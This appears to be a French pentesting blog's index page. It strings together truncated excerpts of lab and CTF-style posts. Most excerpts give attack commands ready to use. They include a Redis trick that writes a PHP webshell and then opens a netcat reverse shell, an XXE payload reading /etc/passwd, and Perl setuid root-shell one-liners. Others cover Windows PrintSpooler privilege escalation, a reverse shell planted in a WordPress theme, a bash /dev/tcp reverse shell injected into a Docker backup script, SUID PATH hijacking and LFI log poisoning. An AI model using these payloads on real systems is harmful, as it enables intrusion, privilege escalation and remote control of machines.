redis-cli -h 10.9.0.19 config set dir /var/www/html config set dbfilename shell.php set test "<?php system($_GET['cmd']);?> http://10.9.0.19/shell.php?cmd=nc 10.9.0.15 4444 -e /bin/sh S’il y a un exception, vous pouvez réessayer après avoir fait un backup et vidé la base de données. Ne pas oublier de restorer la bd Get Webshell You must know the physical path … Continuer la lecture
Par exemple, un application envoie ses données sous forme XML <?xml version="1.0" encoding="UTF-8"?> <comment> <name>Test</name> <author>Germain</author> <com>Une description ici.</com> </comment> Il pourrait être possible d’inclure un fichier <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE comment [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <comment> <name>Test</name> <author>Germain</author> <com>Une description ici. &xxe;</com> </comment> Nous pourrions aussi avoir la possibilité d’exécuter do code … Continuer la lecture
On rencontre souvent des bases de données dans des fichiers .db. La plupart du temps, elles sont au format sqlite Pour lire celle-ci, nous avons recours à l’utilitaire sqlite3 sqlite3 myfile.db Nous pouvons voir les tables dans la base de données .tables Ainsi que la structure de la table PRAGMA table_info(nom_de_la_table) Nous pouvons aussi retrouver … Continuer la lecture
Il est possible de prendre possession d’un ActiveDiectory si nous réussissons à cracker le mot de passe de l’administrateur. On commence par énumérer les services présents sur le AD r0cker@kali:~$ sudo nmap -p- -A -nP 10.10.74.213 Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-28 07:17 EDT Nmap scan report for 10.10.74.213 Host is up (0.086s … Continuer la lecture
Voilà un astuce en exécutant le script linpeas, vous remarque que perl apparaît avec les “capabilities”: cap_setuid+ep set vous pouvez obtenir un shell root perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' Vous pouvez aussi donner à Perl cette capacité: cp $(which perl) . sudo setcap cap_setuid+ep perl ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec … Continuer la lecture
Il existe quelques exploits populaires pour Windows server. Entre autres, Rotten Potato et PrintSpooler. Voici une introduction brève pour l’export PrintSpooler Si vous avez les droits SeImersonatePrivilege ou SeAssignPrimaryTokenPrivilege, vous devriez pouvoir exploiter Windows et obtenir les droits AUTHORITY\SYSTEM whoami /priv PRIVILEGES INFORMATION ———————- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level … Continuer la lecture
On modifie le fichier 404.php du thème par le php-reverse-shell.php (on édite l’adresse IP et le port de la machine de l’attaquant, sinon il faudra POSTer ces variables) On pet par la suite y accéder https://10.10.251.62/wp-content/themes/twentyfifteen/404.php
Nous pouvons voir que nous sommes dans un docker en allant dans /opt/backups Nous pouvons sortir en écrasant backup.sh echo “#!/bin/bash” > backup.sh echo “/bin/bash -c ‘bash -i >& /dev/tcp//1234 0>&1′” >> backup.sh Il existe aussi des scripts d’énumération des dockers Voir la vulnérabilité CVE-2019-14271 parfois nous pouvons nous connecter à un serveur docker à … Continuer la lecture
Lorsque qu’un programme s’exécute avec les droits du propriétaire (SUID), il est peut être possible de modifier le chemin d’accès PATH pour que celui exécute autre chose que ce qui était prévu au départ r0cker@ubuntu:~/secret$ ls -lsa ls -lsa total 40 4 drwxrwx— 2 r0cker r0cker 4096 Jun 27 05:29 . 4 drwxr-xr-x 6 r0cker r0cker 4096 … Continuer la lecture
Cette technique d’infiltration se résume à exécuter une commande et à lire le résultat dans le fichier journal du serveur web. La commande s’injecte via le User-Agent. http://www.vulnerable.com/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=ls On remarquera qu’ici le serveur est vulnérable à l’inclusion local de fichier (LFI) et que le script filtre les requêtes avec “../..” et c’est la raison pour … Continuer la lecture